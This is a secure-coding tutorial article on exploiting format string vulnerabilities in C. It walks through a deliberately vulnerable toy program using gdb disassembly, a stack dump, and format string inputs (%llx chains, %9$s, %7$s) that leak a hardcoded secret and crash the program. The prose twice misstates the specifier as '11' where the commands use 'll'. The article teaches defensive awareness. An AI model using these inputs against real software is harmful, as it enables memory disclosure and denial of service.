Secure coding

How to exploit format string vulnerabilities

Srinivas
September 21, 2020 by
Srinivas

In the previous articles, we discussed printing functions, format strings and format string vulnerabilities. This article provides an overview of how format string vulnerabilities can be exploited.

In this article, we will begin by solving a simple challenge to leak a secret from memory. In the next article, we will discuss another example, where we will chain a format string vulnerability and Buffer Overflow vulnerability to create better impact. 

Learn Secure Coding

Learn Secure Coding

Build your secure coding skills in C/C++, iOS, Java, .NET, Node.js, PHP and other languages.

How can format string vulnerabilities be exploited?

As mentioned in the previous article, the following are some of the attacks possible using format string vulnerabilities.

  • Leaking secrets
  • Denial of Service
  • Leaking memory addresses
  • Overwriting memory addresses 

In this article, let us discuss the first two items.

Leaking secrets from stack

Following is the vulnerable program we will use to understand the approach to exploit a simple format string vulnerability to be able to read data from memory.

#include <stdio.h>

int main(int argc, char *argv[]){

    char *secret = "p@ssw0rD";

    printf(argv[1]);

}

As we can notice, the program is vulnerable to format string vulnerability since the printf function receives user input and prints it. It should be noted that there is no format specifier used in the printf function thus leaving the program vulnerable.

Let us run the program using gdb, check the disassembly of the main function and set up a breakpoint at the address of printf call.

$ gdb ./vulnerable

gef➤  disass main

Dump of assembler code for function main:

   0x0000000000401136 <+0>: endbr64 

   0x000000000040113a <+4>: push   rbp

   0x000000000040113b <+5>: mov    rbp,rsp

   0x000000000040113e <+8>: sub    rsp,0x20

   0x0000000000401142 <+12>: mov    DWORD PTR [rbp-0x14],edi

   0x0000000000401145 <+15>: mov    QWORD PTR [rbp-0x20],rsi

   0x0000000000401149 <+19>: lea    rax,[rip+0xeb4]        # 0x402004

   0x0000000000401150 <+26>: mov    QWORD PTR [rbp-0x8],rax

   0x0000000000401154 <+30>: mov    rax,QWORD PTR [rbp-0x20]

   0x0000000000401158 <+34>: add    rax,0x8

   0x000000000040115c <+38>: mov    rax,QWORD PTR [rax]

   0x000000000040115f <+41>: mov    rdi,rax

   0x0000000000401162 <+44>: mov    eax,0x0

   0x0000000000401167 <+49>: call   0x401040 <printf@plt>

   0x000000000040116c <+54>: mov    eax,0x0

   0x0000000000401171 <+59>: leave  

   0x0000000000401172 <+60>: ret    

End of assembler dump.

gef➤ 

gef➤  b *0x0000000000401167

gef➤  run

As we can see in the preceding excerpt, we have started the program and the breakpoint should hit.

If the breakpoint is hit, that means we are about to execute the printf function. If we examine the stack at this point of time, we should notice the address of the string p@ssw0rD on the stack as highlighted below.

STACK:

0x00007fffffffdf40│+0x0000: 0x00007fffffffe058  → 0x00007fffffffe380  

0x00007fffffffdf48│+0x0008: 0x0000000100401050

0x00007fffffffdf50│+0x0010: 0x00007fffffffe050  →  0x0000000000000001

0x00007fffffffdf58│+0x0018: 0x0000000000402004  →  "p@ssw0rD"

0x00007fffffffdf60│+0x0020: 0x0000000000000000 ← $rbp

0x00007fffffffdf68│+0x0028: 0x00007ffff7ded0b3  →  <__libc_start_main+243> mov edi, eax

0x00007fffffffdf70│+0x0030: 0x00007ffff7ffc620  →  0x0005043700000000

0x00007fffffffdf78│+0x0038: 0x00007fffffffe058  →  0x00007fffffffe380  →  

As we can see in the preceding excerpt, there is an address (0x0000000000402004) on the stack, which is pointing to the string "p@ssw0rD". 

Our objective is to leak this string using the format string vulnerability existing in the vulnerable program.

Let us pass multiple  %llx strings as user input separated by a colon. %llx is to print long hex values since we are working on a 64-bit processor.

The output looks as follows.

$ ./vulnerable %llx:%llx:%llx:%llx:%llx:%llx:%llx:%llx:%llx:%llx:%llx:%llx:%llx:%llx:%llx:%llx:%llx:%llx:%llx:%llx:%llx:%llx:%llx:%llx:%llx 7ffca4114f28:7ffca4114f40:401180:0:7f4e3060bd50:7ffca4114f28:200401050:7ffca4114f20:402004:0:7f4e3041c0b3:7f4e30627620:7ffca4114f28:200000000:401136:401180:36f0efdaa04eb405:401050:7ffca4114f20:0:0:c909a7f83cceb405:c86c8f592080b405:0:0

As we can notice in the preceding output, the address 402004 is leaked. This is the same address we noticed on the stack earlier. This means, we are able to leak the address of the string p@ssw0rD. 

We specified multiple %llx strings to be able to dump the address and the rest of the entries dumped from the stack are not useful for us. So, we can choose to dump only the address that we want by using Direct Parameter Access. This can be done by specifying the distance at which the address is printed. In this case, the 9th value is the address. We can use %9$11x to directly access this address. This looks as follows.

$ ./vulnerable %9$llx

402004

$

As we can notice, we managed to leak just the address that we wanted.  However, we have leaked the address and not the actual string value. To be able to leak the actual string instead of the address, we can use %9$11s. This will ask the printf function to print the value pointed by the 9th position on the stack. This looks as follows.

$ ./vulnerable %9$s

p@ssw0rD

$

We managed to successfully leak the secret string from the stack by using a format string vulnerability in the target binary. 

Crashing the program

In the previous section, we used %9$s as our format specifier and dumped the secret string from the stack. This technique worked because 9th value is a valid address that is pointing to our secret string.

If we try to access an invalid memory location in a similar fashion, that will cause a segmentation fault leading to crashing the program. The following excerpt shows that accessing the 7th position on the stack to print a string value pointed by the address causes a segmentation fault since the address is invalid.

$ ./vulnerable %7$s

Segmentation fault (core dumped)

$

The crash occurred because the value at the 7th position may not be a valid address. Rather, it could be an address from kernel space or non-address value such as a simple integer or character.

These two examples clearly show how format string vulnerabilities can be used to leak memory and crash the program.

Conclusion

Format String vulnerabilities clearly can create great damage, when exploited. One can easily read data from arbitrary memory locations and even crash the applications using them. The impact can be more if these vulnerabilities are chained with other vulnerabilities such as buffer overflow. In the next article, we will discuss how one can chain format string vulnerabilities and buffer overflows to bypass memory protections such as stack canaries.

Learn Secure Coding

Learn Secure Coding

Build your secure coding skills in C/C++, iOS, Java, .NET, Node.js, PHP and other languages.

Sources

Srinivas
Srinivas

Srinivas is an Information Security professional with 4 years of industry experience in Web, Mobile and Infrastructure Penetration Testing. He is currently a security researcher at Infosec Institute Inc. He holds Offensive Security Certified Professional(OSCP) Certification. He blogs atwww.androidpentesting.com. Email: srini0x00@gmail.com